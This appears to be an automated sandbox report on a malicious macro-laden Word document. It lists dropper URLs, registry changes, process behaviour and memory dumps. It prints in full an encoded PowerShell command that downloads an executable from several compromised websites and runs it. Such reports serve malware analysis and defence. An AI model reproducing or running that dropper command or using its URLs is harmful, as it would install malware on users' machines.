Analysis
-
max time kernel
29s -
max time network
31s -
resource
win7v191014 -
submitted
04-02-2020 09:40
Task
task1
Sample
3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc
Resource
win7v191014
0 signatures
General
-
Target
3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc
-
Sample
200204-2vbpsamrx2
-
SHA256
3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://crimecitynews.com/wp-includes/DeHZs1/
exe.dropper
http://clicksbyayush.com/wp-content/T721/
exe.dropper
https://www.hgklighting.com/dacecb0fcd2bc6cbe09ed1527e527b37/pwdSS610g/
exe.dropper
http://cheapwebvn.net/wp-content/cache/uZLPqwbGic/
exe.dropper
http://sundevilstudentwork.com/wp-content/N4h2nKXI/
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 856 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
PoWERsheLL.exepid process 488 PoWERsheLL.exe -
Drops file in System32 directory 1 IoCs
Processes:
PoWERsheLL.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk PoWERsheLL.exe -
Executes dropped EXE 1 IoCs
Processes:
894.exepid process 1808 894.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE894.exepid process 856 WINWORD.EXE 1808 894.exe -
Process spawned unexpected child process 1 IoCs
Processes:
PoWERsheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 488 1528 PoWERsheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PoWERsheLL.exedescription pid process Token: SeDebugPrivilege 488 PoWERsheLL.exe -
Blacklisted process makes network request 2 IoCs
Processes:
PoWERsheLL.exeflow pid process 15 488 PoWERsheLL.exe 17 488 PoWERsheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exePoWERsheLL -e JABLAHcAZQBtAHoAdQBwAHIAdQBmAD0AJwBGAG4AawBnAGcAegB2AHQAJwA7ACQATQB2AG0AcgB2AGUAZABnACAAPQAgACcAOAA5ADQAJwA7ACQAQgB0AG0AbgBrAGQAdABxAGIAZQBuAHkAPQAnAEwAcABnAGQAbAByAHIAcABtACcAOwAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABNAHYAbQByAHYAZQBkAGcAKwAnAC4AZQB4AGUAJwA7ACQARwBvAHkAZABrAGIAbgBjAGUAZAB0AG0AZwA9ACcAQgBwAGwAdgByAG8AYgBhAHYAagBwACcAOwAkAFMAZABoAGsAZABrAGgAcwBpAHQAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBOAHQAOwAkAFMAegB1AGEAZAB3AHAAcwBlAG8AdwA9ACcAaAB0AHQAcAA6AC8ALwBjAHIAaQBtAGUAYwBpAHQAeQBuAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBEAGUASABaAHMAMQAvACoAaAB0AHQAcAA6AC8ALwBjAGwAaQBjAGsAcwBiAHkAYQB5AHUAcwBoAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AVAA3ADIAMQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaABnAGsAbABpAGcAaAB0AGkAbgBnAC4AYwBvAG0ALwBkAGEAYwBlAGMAYgAwAGYAYwBkADIAYgBjADYAYwBiAGUAMAA5AGUAZAAxADUAMgA3AGUANQAyADcAYgAzADcALwBwAHcAZABTAFMANgAxADAAZwAvACoAaAB0AHQAcAA6AC8ALwBjAGgAZQBhAHAAdwBlAGIAdgBuAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBhAGMAaABlAC8AdQBaAEwAUABxAHcAYgBHAGkAYwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgBkAGUAdgBpAGwAcwB0AHUAZABlAG4AdAB3AG8AcgBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgA0AGgAMgBuAEsAWABJAC8AJwAuACIAUwBgAHAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAGEAbQBoAHcAbwBlAG8AdQBtAD0AJwBBAHcAZQBkAHIAYwB6AHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAbwBkAGYAaQB6AGMAegAgAGkAbgAgACQAUwB6AHUAYQBkAHcAcABzAGUAbwB3ACkAewB0AHIAeQB7ACQAUwBkAGgAawBkAGsAaABzAGkAdAAuACIARABgAE8AVwBuAGwAbwBBAGQAZgBgAGkAYABMAGUAIgAoACQAVABvAGQAZgBpAHoAYwB6ACwAIAAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsACkAOwAkAEIAZABxAHkAawBmAG8AZAB1AHYAawA9ACcARABxAGwAcQBzAGEAeQBnAGMAdgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsACkALgAiAEwAYABFAE4AYABHAHQASAAiACAALQBnAGUAIAAzADQAMgAyADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGAARQBhAFQAZQAiACgAJABIAHoAeQBpAGYAbAB4AHAAYQBzAGMAbAApADsAJABXAHgAZABnAHAAcwBuAGEAeQBpAHIAeAA9ACcAQQByAHMAdQBzAHkAbABiAG0AZgBtAGgAeAAnADsAYgByAGUAYQBrADsAJABaAGkAeABoAHQAaQBxAHoAbgBnAD0AJwBLAGYAaQB1AHMAbwBiAHgAbwBqAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB2AGsAeAB1AGgAdQBuAHEAegBhAHQAPQAnAFAAagByAGYAbwB6AGoAYgB3AGUAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
-
C:\Users\Admin\894.exeC:\Users\Admin\894.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\894.exe
-
C:\Users\Admin\894.exe
-
memory/856-0-0x0000000005BD0000-0x0000000005CD0000-memory.dmpFilesize
1024KB
-
memory/856-2-0x0000000007BA0000-0x0000000007BA4000-memory.dmpFilesize
16KB
-
memory/856-5-0x0000000009FA0000-0x0000000009FA4000-memory.dmpFilesize
16KB
-
memory/856-6-0x000000000B020000-0x000000000B024000-memory.dmpFilesize
16KB